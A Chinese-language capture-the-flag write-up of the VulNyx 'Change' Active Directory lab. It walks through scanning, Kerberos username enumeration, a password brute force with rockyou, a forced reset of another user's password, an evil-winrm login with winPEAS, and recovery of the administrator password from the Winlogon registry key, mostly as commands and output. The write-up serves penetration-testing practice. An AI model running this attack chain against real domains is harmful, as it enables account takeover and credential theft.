靶场:VulNyx
地址:https://vulnyx.com/file/Change.php
系统:Windows
内容:AD基本操作
端口扫描情况如下。
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-15 00:41:13Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megachange.nyx0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megachange.nyx0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
49685/tcp open msrpc Microsoft Windows RPC
49699/tcp open msrpc Microsoft Windows RPC
49715/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:45:42:91 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: Host: CHANGE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-03-15T00:42:09
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 15h59m56s
| nbstat: NetBIOS name: CHANGE, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:45:42:91 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
| Names:
| CHANGE<00> Flags: <unique><active>
| MEGACHANGE<00> Flags: <group><active>
| MEGACHANGE<1c> Flags: <group><active>
| CHANGE<20> Flags: <unique><active>
|_ MEGACHANGE<1b> Flags: <unique><active>
查看一下AD基本信息,将CHANGE.megachange.nyx和megachange.nyx加入hosts。
~/D/c $ldapsearch -x -H ldap://$IP -s base
rootDomainNamingContext: DC=megachange,DC=nyx
ldapServiceName: megachange.nyx:change$@MEGACHANGE.NYX
...
dsServiceName: CN=NTDS Settings,CN=CHANGE,CN=Servers,CN=Default-First-Site-Nam
e,CN=Sites,CN=Configuration,DC=megachange,DC=nyx
dnsHostName: CHANGE.megachange.nyx
defaultNamingContext: DC=megachange,DC=nyx
...
由于没有其它信息可用,smb空账号枚举也没有任何发现,下面看能否爆出一些用户名。
~/D/c $kerbrute_linux_amd64 userenum -d megachange.nyx --dc $IP /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 03/15/25 - Ronnie Flathers @ropnop
2025/03/15 03:40:34 > Using KDC(s):
2025/03/15 03:40:34 > 192.168.56.10:88
2025/03/15 03:40:41 > [+] VALID USERNAME: alfredo@megachange.nyx
2025/03/15 03:40:43 > [+] VALID USERNAME: administrator@megachange.nyx
2025/03/15 03:40:47 > [+] VALID USERNAME: change@megachange.nyx
2025/03/15 03:41:44 > [+] VALID USERNAME: Administrator@megachange.nyx
2025/03/15 03:41:58 > [+] VALID USERNAME: Alfredo@megachange.nyx
2025/03/15 03:41:58 > [+] VALID USERNAME: sysadmin@megachange.nyx
2025/03/15 03:43:07 > [+] VALID USERNAME: Change@megachange.nyx
...
管理员的密码就不要想爆破出来了,只有alfredo用户的密码值得尝试爆破一下。
~/D/c $crackmapexec smb $IP -u alfredo -p /usr/share/wordlists/rockyou.txt | grep -v STATUS_LOGON_FAILURE
SMB 192.168.56.10 445 CHANGE [*] Windows 10 / Server
SMB 192.168.56.10 445 CHANGE [+] megachange.nyx\alfredo:Password1
查看一下alfredo的权限,可以登录smb和ldap。
~/D/c $/opt/check_auth.sh -u alfredo -p Password1 $IP
Running: netexec smb 192.168.56.10 -u alfredo -p Password1
SMB 192.168.56.10 445 CHANGE [*] Windows 10 / Server 2019 Build 17763 x64 (name:CHANGE) (domain:megachange.nyx) (signing:True) (SMBv1:False)
SMB 192.168.56.10 445 CHANGE [+] megachange.nyx\alfredo:Password1
----------------------------------------
Running: netexec winrm 192.168.56.10 -u alfredo -p Password1
WINRM 192.168.56.10 5985 CHANGE [*] Windows 10 / Server 2019 Build 17763 (name:CHANGE) (domain:megachange.nyx)
WINRM 192.168.56.10 5985 CHANGE [-] megachange.nyx\alfredo:Password1
----------------------------------------
Running: netexec ldap 192.168.56.10 -u alfredo -p Password1
SMB 192.168.56.10 445 CHANGE [*] Windows 10 / Server 2019 Build 17763 x64 (name:CHANGE) (domain:megachange.nyx) (signing:True) (SMBv1:False)
LDAP 192.168.56.10 389 CHANGE [+] megachange.nyx\alfredo:Password1
----------------------------------------
查看一下域用户,其实也就是刚才爆出的那几个。
~/D/c $rpcclient -U "alfredo%Password1" $IP -c "enumdomusers"
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[alfredo] rid:[0x44f]
user:[sysadmin] rid:[0x450]
收集bloodhound信息。
~/D/c $netexec ldap $IP -u alfredo -p Password1 --bloodhound --collection All --dns-server $IP
SMB 192.168.56.10 445 CHANGE [*] Windows 10 / Server 2019 Build 17763 x64 (name:CHANGE) (domain:megachange.nyx) (signing:True) (SMBv1:False)
LDAP 192.168.56.10 389 CHANGE [+] megachange.nyx\alfredo:Password1
LDAP 192.168.56.10 389 CHANGE Resolved collection methods: objectprops, psremote, localadmin, container, rdp, dcom, group, acl, trusts, session
LDAP 192.168.56.10 389 CHANGE Done in 00M 01S
LDAP 192.168.56.10 389 CHANGE Compressing output into /home/kali/.nxc/logs/CHANGE_192.168.56.10_2025-03-15_044954_bloodhound.zip
修改sysadmin的密码。
~/D/c $mv ~/.nxc/logs/CHANGE_192.168.56.10_2025-03-15_044954_bloodhound.zip ./
~/D/c $net rpc password "sysadmin" "Password2" -U megachange.nyx/alfredo%Password1 -S change.megachange.nyx
~/D/c $netexec winrm $IP -u sysadmin -p Password2
WINRM 192.168.56.10 5985 CHANGE [*] Windows 10 / Server 2019 Build 17763 (name:CHANGE) (domain:megachange.nyx)
WINRM 192.168.56.10 5985 CHANGE [+] megachange.nyx\sysadmin:Password2 (Pwn3d!)
evil-winrm登录,上传winPEAS,搜索敏感信息。
~/D/c $evil-winrm -i $IP -u sysadmin -p Password2
...
*Evil-WinRM* PS C:\Users\sysadmin\Documents> upload winPEASx64.exe
Info: Uploading /home/kali/Documents/change/winPEASx64.exe to C:\Users\sysadmin\Documents\winPEASx64.exe
Data: 13122900 bytes of 13122900 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\sysadmin\Documents> .\winPEASx64.exe > out.log
然后发现了admin的密码。
������������ Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultDomainName : MEGACHANGE
DefaultUserName : administrator
DefaultPassword : d0m@in_c0ntr0ll3r
该信息其实是保存在注册表中的。
*Evil-WinRM* PS C:\Users\sysadmin\Documents> Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
AutoRestartShell : 1
Background : 0 0 0
CachedLogonsCount : 10
DebugServerCommand : no
DefaultDomainName : MEGACHANGE
DefaultUserName : administrator
DisableBackButton : 1
EnableSIHostIntegration : 1
ForceUnlockLogon : 0
LegalNoticeCaption :
LegalNoticeText :
PasswordExpiryWarning : 5
PowerdownAfterShutdown : 0
PreCreateKnownFolders : {A520A1A4-1780-4FF6-BD18-167343C5AF16}
ReportBootOk : 1
Shell : explorer.exe
ShellCritical : 0
ShellInfrastructure : sihost.exe
SiHostCritical : 0
SiHostReadyTimeOut : 0
SiHostRestartCountLimit : 0
SiHostRestartTimeGap : 0
Userinit : C:\Windows\system32\userinit.exe,
VMApplet : SystemPropertiesPerformance.exe /pagefile
WinStationsDisabled : 0
ShellAppRuntime : ShellAppRuntime.exe
scremoveoption : 0
DisableCAD : 1
LastLogOffEndTimePerfCounter : 12624879505
ShutdownFlags : 2147483687
DisableLockWorkstation : 0
DefaultPassword : d0m@in_c0ntr0ll3r
AutoAdminLogon : 0
AutoLogonSID : S-1-5-21-604841344-1972660676-6905362-500
LastUsedUsername : administrator
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
PSChildName : Winlogon
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry